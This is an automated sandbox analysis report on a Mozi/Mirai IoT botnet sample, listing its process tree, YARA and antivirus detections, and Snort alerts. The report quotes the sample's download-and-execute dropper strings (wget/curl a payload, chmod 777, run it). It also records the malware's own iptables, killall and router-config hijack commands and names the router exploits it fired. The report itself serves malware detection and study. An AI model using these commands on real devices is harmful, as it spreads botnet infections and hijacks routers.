Loading ...

Play interactive tourEdit tour

Analysis Report mozi.a.zip

Overview

General Information

Sample Name:mozi.a.zip
Analysis ID:349551
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • mozi.a.zip (PID: 4580, Parent: 4518, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/mozi.a.zip
    • mozi.a.zip New Fork (PID: 4596, Parent: 4580)
      • mozi.a.zip New Fork (PID: 4598, Parent: 4596)
        • sh (PID: 4600, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4602, Parent: 4600)
          • killall (PID: 4602, Parent: 4600, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • mozi.a.zip New Fork (PID: 4621, Parent: 4598)
          • sh (PID: 4634, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4638, Parent: 4634)
            • iptables (PID: 4638, Parent: 4634, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              • iptables New Fork (PID: 4652, Parent: 4638)
              • modprobe (PID: 4652, Parent: 4638, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4668, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4670, Parent: 4668)
            • iptables (PID: 4670, Parent: 4668, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
          • sh (PID: 4671, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4674, Parent: 4671)
            • iptables (PID: 4674, Parent: 4671, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
          • sh (PID: 4711, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
            • sh New Fork (PID: 4718, Parent: 4711)
            • iptables (PID: 4718, Parent: 4711, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
          • sh (PID: 4732, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
            • sh New Fork (PID: 4737, Parent: 4732)
            • iptables (PID: 4737, Parent: 4732, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
          • sh (PID: 4741, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
            • sh New Fork (PID: 4747, Parent: 4741)
            • iptables (PID: 4747, Parent: 4741, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
          • sh (PID: 4764, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
            • sh New Fork (PID: 4772, Parent: 4764)
            • iptables (PID: 4772, Parent: 4764, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
          • sh (PID: 4789, Parent: 4621, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
            • sh New Fork (PID: 4793, Parent: 4789)
            • iptables (PID: 4793, Parent: 4789, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
        • sh (PID: 4811, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4813, Parent: 4811)
          • iptables (PID: 4813, Parent: 4811, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4814, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4816, Parent: 4814)
          • iptables (PID: 4816, Parent: 4814, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4818, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4825, Parent: 4818)
          • iptables (PID: 4825, Parent: 4818, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4838, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4847, Parent: 4838)
          • iptables (PID: 4847, Parent: 4838, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4865, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4875, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4887, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4895, Parent: 4887)
          • iptables (PID: 4895, Parent: 4887, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4911, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4918, Parent: 4911)
          • iptables (PID: 4918, Parent: 4911, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4938, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4945, Parent: 4938)
          • iptables (PID: 4945, Parent: 4938, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 4960, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4966, Parent: 4960)
          • iptables (PID: 4966, Parent: 4960, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 4978, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4978)
          • iptables (PID: 4985, Parent: 4978, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 4998, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5004, Parent: 4998)
          • iptables (PID: 5004, Parent: 4998, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 5015, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5022, Parent: 5015)
          • iptables (PID: 5022, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5034, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5042, Parent: 5034)
          • iptables (PID: 5042, Parent: 5034, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5053, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5060, Parent: 5053)
          • iptables (PID: 5060, Parent: 5053, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5072, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5072)
          • iptables (PID: 5079, Parent: 5072, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5087, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5097, Parent: 5087)
          • iptables (PID: 5097, Parent: 5087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5113, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5118, Parent: 5113)
          • iptables (PID: 5118, Parent: 5113, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5217, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5219, Parent: 5217)
          • iptables (PID: 5219, Parent: 5217, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
        • sh (PID: 5220, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5222, Parent: 5220)
          • iptables (PID: 5222, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
        • sh (PID: 5223, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5226, Parent: 5223)
          • iptables (PID: 5226, Parent: 5223, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
        • sh (PID: 5233, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
          • sh New Fork (PID: 5242, Parent: 5233)
          • iptables (PID: 5242, Parent: 5233, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
        • sh (PID: 5255, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
          • sh New Fork (PID: 5265, Parent: 5255)
          • iptables (PID: 5265, Parent: 5255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 8987 -j ACCEPT
        • sh (PID: 5282, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
          • sh New Fork (PID: 5288, Parent: 5282)
          • iptables (PID: 5288, Parent: 5282, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
        • sh (PID: 5306, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
          • sh New Fork (PID: 5314, Parent: 5306)
          • iptables (PID: 5314, Parent: 5306, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
        • sh (PID: 5332, Parent: 4598, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
          • sh New Fork (PID: 5338, Parent: 5332)
          • iptables (PID: 5338, Parent: 5332, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
  • upstart New Fork (PID: 5136, Parent: 3310)
  • sh (PID: 5136, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5141, Parent: 5136)
    • date (PID: 5141, Parent: 5136, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5154, Parent: 5136)
    • apport-checkreports (PID: 5154, Parent: 5136, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 5163, Parent: 3310)
  • sh (PID: 5163, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5164, Parent: 5163)
    • date (PID: 5164, Parent: 5163, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5181, Parent: 5163)
    • apport-gtk (PID: 5181, Parent: 5163, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 5190, Parent: 3310)
  • sh (PID: 5190, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5191, Parent: 5190)
    • date (PID: 5191, Parent: 5190, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5208, Parent: 5190)
    • apport-gtk (PID: 5208, Parent: 5190, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
mozi.a.zipSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
mozi.a.zipJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    mozi.a.zipJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      mozi.a.zipJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
        /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: mozi.a.zipAvira: detected
              Antivirus detection for dropped fileShow sources
              Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
              Multi AV Scanner detection for submitted fileShow sources
              Source: mozi.a.zipVirustotal: Detection: 65%Perma Link
              Source: mozi.a.zipMetadefender: Detection: 51%Perma Link
              Source: mozi.a.zipReversingLabs: Detection: 67%

              Spreading:

              barindex
              Found strings indicative of a multi-platform dropperShow sources
              Source: mozi.a.zipString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: mozi.a.zipString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: mozi.a.zipString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Opens /proc/net/* files useful for finding connected devices and routersShow sources
              Source: /tmp/mozi.a.zip (PID: 4621)Opens: /proc/net/route
              Source: /tmp/mozi.a.zip (PID: 4621)Opens: /proc/net/route

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.114.71.142: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.169.237.142: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.187.191: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38870 -> 151.139.241.251:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38870 -> 151.139.241.251:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.162.120.168: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.20.247.252: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.18.39: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.197: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.89.22.107: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.91.239.157: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 166.127.254.2: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.171.22.94: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.141.42.51: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 36.89.55.95:6881 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 88.86.98.50: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48066 -> 175.203.81.2:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48066 -> 175.203.81.2:80
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.171.18:48131 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42806 -> 144.76.43.37:80
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35088 -> 23.254.64.88:80
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.97.168.156:5353 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.39.1.58: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.165.238.97: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46030 -> 203.46.145.77:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46030 -> 203.46.145.77:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.185.94.208: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.224.238.149: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:49398 -> 23.217.12.208:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:49398 -> 23.217.12.208:80
              Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.12.208:80 -> 192.168.2.20:49398
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51358 -> 172.67.201.119:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51358 -> 172.67.201.119:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32828 -> 47.246.22.230:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60698 -> 159.140.205.214:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32828 -> 47.246.22.230:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.159.88.60: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.189.42: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.193.139.218: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.169.97.135: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60198 -> 24.239.192.38:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:58988 -> 13.89.231.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60198 -> 24.239.192.38:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:58988 -> 13.89.231.175:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36372 -> 113.161.185.44:80
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57414 -> 41.57.99.92:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57414 -> 41.57.99.92:80
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:56274 -> 176.116.205.200:52869
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.167.162.206: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.22.47: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48524 -> 193.248.153.76:80
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.70.255:1900 -> 192.168.2.20:8987
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:55086 -> 74.79.213.38:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:55086 -> 74.79.213.38:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.216.193.84: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.7.204.55: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40316 -> 156.225.150.183:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40316 -> 156.225.150.183:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.45.252.1: -> 192.168.2.20:
